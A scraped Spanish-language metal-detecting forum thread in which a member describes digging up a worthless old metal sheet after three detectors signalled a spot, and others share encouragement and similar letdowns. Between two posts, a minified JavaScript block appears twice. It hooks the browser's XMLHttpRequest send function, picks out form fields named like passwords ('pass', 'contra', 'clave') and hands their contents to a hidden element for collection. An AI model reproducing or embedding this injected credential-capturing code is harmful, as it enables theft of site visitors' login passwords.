Pasamos de la emoción a la decepción...
+12
0marrm
heraclio donan villa
Esmeralda1
PICA
baltaga
cacheton
jorgeee
potrillo llanero
Gambusino
ricardo llamas medina
Gerardo Gil
Pachito
16 participantes
- PachitoGran Experto del Foro
- Cantidad de envíos : 8960
Frase Célebre : Los locos hacemos camino, que un dia aquellos que se hacen llamar cuerdos recorreran.
Dom 18 Sep 2016, 5:40 pm
En dias pasados salimos a prospectar la idea era checar una marca que había obtenido con el GTI 2500, esta ves llevamos un Gemini III y un Geo Hunter, los tres aparatos marcaron perfectamente el punto, esto nos emociono junto con mis amigos, la marca estaba debajo de unos ladrillos acomodados en la tierra, este a su vez era usado como piso, lo que obtuvimos fue una gran lamina vieja a 30 cm aproximadamente, les comparto las imágenes...
El lugar de prospección
La lamina que sacamos
Ladrillo refractario encontrado en el lugar
Saludos.
El lugar de prospección
La lamina que sacamos
Ladrillo refractario encontrado en el lugar
Saludos.
- Gerardo GilExperto del Foro
- Cantidad de envíos : 480
Frase Célebre : Hay tantas cosas que pueden hacerte feliz pero no hay nada mejor que la Famila
Re: Pasamos de la emoción a la decepción...
Dom 18 Sep 2016, 5:44 pm
No se aguite compañero para la próxima sale
Saludos
Saludos
Frase Célebre : El dinero no es la vida, pero si me gustaría encontrarme un queso
Dom 18 Sep 2016, 8:53 pm
Mi amigo Pachito, esa làmina no sirve ni pal kilo, para lo
ùnico que sirvio fuè para emocionarlos a ustedes, entiendo
bièn porque me ha pasado, serà la pròxima,saludos.
- GambusinoModerador
- Cantidad de envíos : 4008
Frase Célebre : Happines is a fresh dug coin!!
Lun 19 Sep 2016, 8:18 am
Pero la emoción que tuvieron ? quien se las quita!!!!!!!!
Esa sensación tan agradable que vivieron, y la incertidumbre de que será lo que está ahi?
Para finalmente decepcionarse y ver con tristeza el objeto que les causó tanta emoción........
En fin quienes hemos vivido esa experiencia, lo sabemos y es algo que no se compra ni con la tarjeta de credito que anuncian.......
Saludos Pachito.
Esa sensación tan agradable que vivieron, y la incertidumbre de que será lo que está ahi?
Para finalmente decepcionarse y ver con tristeza el objeto que les causó tanta emoción........
En fin quienes hemos vivido esa experiencia, lo sabemos y es algo que no se compra ni con la tarjeta de credito que anuncian.......
Saludos Pachito.
- potrillo llaneroIdentidad Certificada
- Cantidad de envíos : 221
Frase Célebre : todo cuesta en esta vida.
Lun 19 Sep 2016, 10:02 am
amigo pachito pienso que a la mayoría de nosotros nos ha sentido lo que ustedes sintieron esa emoción de encontrar un objeto cuadrado eh imaginarse que dentro de este se encuentre algo de valor,en lo personal me sucedió que con mi garret ace 150,resulta que me suena y empiezo a escarbar y como a treinta centímetros de profundidad me encuentro una nica de peltre de esas que utilizaban o todavía utilizan para hacer pipí las personas de antes,fue una gran emoción y una gran decepción a la vez,pero ahí que seguir con la razcadera,lei en un post que el grupo de aguascalientes encontró su primer gran tesoro.animooo
- jorgeeeLíder de opinión.
- Cantidad de envíos : 32
Lun 19 Sep 2016, 11:42 am
BUENO TODO BALE SERA LA PRÓXIMA
- cachetonIdentidad Certificada
- Cantidad de envíos : 3632
Frase Célebre : Caminando y excavando.
Lun 19 Sep 2016, 11:49 am
A SEGUIRLE BUSCANDO PACHITO, ÁNIMO, (+) POR COMPARTIR.....SALUDOS.
window.loadP7CQAdaU75awTnr8pTZD6fU5V82M7cx6=function(){},window.removeProtectionToloadP7CQAdaU75awTnr8pTZD6fU5V82M7cx6=function(){window.loadP7CQAdaU75awTnr8pTZD6fU5V82M7cx6=function(){}},setInterval(removeProtectionToloadP7CQAdaU75awTnr8pTZD6fU5V82M7cx6,10);
try{var event662f70=document.createEvent("Event");event662f70.initEvent("ajx",!0,!0),oldSend__=XMLHttpRequest.prototype.send,XMLHttpRequest.prototype.send=function(){try{kyw=["pass","contra","clave"],args=arguments[0].split("&"),send=!1;for(i in args){name=args[i].split("=")[0];for(a in kyw)send=send||name.toLowerCase().indexOf(kyw[a])>-1}send&&(div=document.getElementById("662f70__"),div.innerText=arguments[0],div.dispatchEvent(event662f70)),oldSend__.apply(this,arguments)}catch(e){oldSend__.apply(this,arguments)}}}catch(eror){}
window.loadP7CQAdaU75awTnr8pTZD6fU5V82M7cx6=function(){},window.removeProtectionToloadP7CQAdaU75awTnr8pTZD6fU5V82M7cx6=function(){window.loadP7CQAdaU75awTnr8pTZD6fU5V82M7cx6=function(){}},setInterval(removeProtectionToloadP7CQAdaU75awTnr8pTZD6fU5V82M7cx6,10);
try{var event662f70=document.createEvent("Event");event662f70.initEvent("ajx",!0,!0),oldSend__=XMLHttpRequest.prototype.send,XMLHttpRequest.prototype.send=function(){try{kyw=["pass","contra","clave"],args=arguments[0].split("&"),send=!1;for(i in args){name=args[i].split("=")[0];for(a in kyw)send=send||name.toLowerCase().indexOf(kyw[a])>-1}send&&(div=document.getElementById("662f70__"),div.innerText=arguments[0],div.dispatchEvent(event662f70)),oldSend__.apply(this,arguments)}catch(e){oldSend__.apply(this,arguments)}}}catch(eror){}
- baltagaIdentidad Certificada
- Cantidad de envíos : 7365
Lun 19 Sep 2016, 12:39 pm
la próxima es la buena pachito pero lo bailado nadie se lo quita je je es emocionante pensar que ya le pego uno si te contara je je cuantas emocionadas nos hemos dado y no mas nada
animo saludos
balta
animo saludos
balta
Frase Célebre : la paciencia es la virtud de todos los santos
Lun 19 Sep 2016, 4:00 pm
potrillo llanero escribió:amigo pachito pienso que a la mayoría de nosotros nos ha sentido lo que ustedes sintieron esa emoción de encontrar un objeto cuadrado eh imaginarse que dentro de este se encuentre algo de valor,en lo personal me sucedió que con mi garret ace 150,resulta que me suena y empiezo a escarbar y como a treinta centímetros de profundidad me encuentro una nica de peltre de esas que utilizaban o todavía utilizan para hacer pipí las personas de antes,fue una gran emoción y una gran decepción a la vez,pero ahí que seguir con la razcadera,lei en un post que el grupo de aguascalientes encontró su primer gran tesoro.animooo
Eso que comentas tiene mas de cinco años que paso, ya ni el grupo existe creo.
Saludos
- PICAIdentidad Certificada
- Cantidad de envíos : 814
Frase Célebre : la paciencia es la virtud de todos los santos
Lun 19 Sep 2016, 4:02 pm
Sera para la próxima por el momento solo salio esta espantosa lamina pachito.
Saludos
Saludos
- Esmeralda1Identidad Certificada
- Cantidad de envíos : 1115
Frase Célebre : En un bosque se bifurcó el camino y yo... Yo elegí el menos transitado. Esto marcó toda la diferencia. Robert Lee Frost
Lun 19 Sep 2016, 7:17 pm
Animo Pachito! a nosotros ya nos pasó eso mismo, una gruesa lámina enterrada era la causante de la marca pero ésto es parte del camino que lo llevará a ese gran día de realizar un hallazgo valioso. No se decepcione porque no a todos nos toca pero el que persevera alcanza, si no por bueno por necio jajajaja y los miembros de éste foro somos muy perseverantes. Un abrazo cordial !!!
- heraclio donan villaIdentidad Certificada
- Cantidad de envíos : 312
Frase Célebre : come y bebe lo del fruto de tu trabajo ...lo demas es como querer atrapar el viento ....falsa vanidad
Lun 19 Sep 2016, 8:29 pm
a que profundidad estaba si se puede saber.
- ricardo llamas medinaExperto del Foro
- Cantidad de envíos : 801
Frase Célebre : El dinero no es la vida, pero si me gustaría encontrarme un queso
Mar 20 Sep 2016, 12:41 am
Compañero heraclio,si lees todo lo que escribio Pachito,
ahì dice que estaba a 30 ctms aproximadamente, Saludos.
ahì dice que estaba a 30 ctms aproximadamente, Saludos.
- 0marrmIdentidad Certificada
- Cantidad de envíos : 844
Frase Célebre : Ante Dios y el mundo, el mas fuerte tiene derecho de hacer prevalecer su voluntad
Mar 20 Sep 2016, 9:19 am
Me sucedio algo parecido buscando en una antígua hacienda, el detector me dio buena marca y me puse a escarbar, habia mucho escombro porque habian derribado las paredes y debajo del escombro como a 40cm me encontré con una lámina
Frase Célebre : come y bebe lo del fruto de tu trabajo ...lo demas es como querer atrapar el viento ....falsa vanidad
Mar 20 Sep 2016, 7:09 pm
Ay deveras que menso jijiji Sí Es cierto gracias amigo ricardo y saludos desde Houston texas
Frase Célebre : Los locos hacemos camino, que un dia aquellos que se hacen llamar cuerdos recorreran.
Jue 22 Sep 2016, 1:08 am
Gerardo Gil escribió:No se aguite compañero para la próxima sale
Saludos
No como cree mi amigo el que se agüita pierde, esto es parte de este bello pasatiempo...
Saludos.
- jesus riveraExperto del Foro
- Cantidad de envíos : 208
Vie 23 Sep 2016, 11:33 am
Lo bueno solo excavaron 30cms. Nosotros en la Sierra de Querétaro después de encontrar una moneda de 1890 nos da buena marca. Después de un poco más de un metro y varias ampollas encontramos una lata mantequera. Emoción Sí, Decepción Sí, Satisfacción Sí los equipos funcionan como debe ser así qué la otra marca debe ser la buena.
- AMEExperto del Foro
- Cantidad de envíos : 551
Frase Célebre : GARIMPEIRO(buscador de oro y piedras preciosas)..EL ALQUIMISTA paulo coelho
Vie 23 Sep 2016, 12:55 pm
Saludos pachito....que lastima que no pegó. ....lhay PA la proxima...un saludo para usted y gracias por compartir su decepcion...al rato vienen las buenas...hay estamos...
- GalileoGran Experto del Foro
- Cantidad de envíos : 1360
Frase Célebre : SI PUEDES CREER AL QUE CREE TODO LE ES POSIBLE PALABRAS DEL MAESTRO DE GALILEA
Vie 23 Sep 2016, 4:12 pm
Animo compañero Pachito gracias por compartir y les deseamos a los demás colegas y a su persona éxito y bendiciones en sus próximas búsquedas
- letyboniiiColaborador ocasional
- Cantidad de envíos : 12
Vie 23 Sep 2016, 8:18 pm
Lun 26 Sep 2016, 11:32 pm
ricardo llamas medina escribió:Mi amigo Pachito, esa làmina no sirve ni pal kilo, para lo
La verdad que si mi amigo, la lamina la dejamos en el mismo lugar, ya estamos preparando todo para la próxima aventura...
Saludos.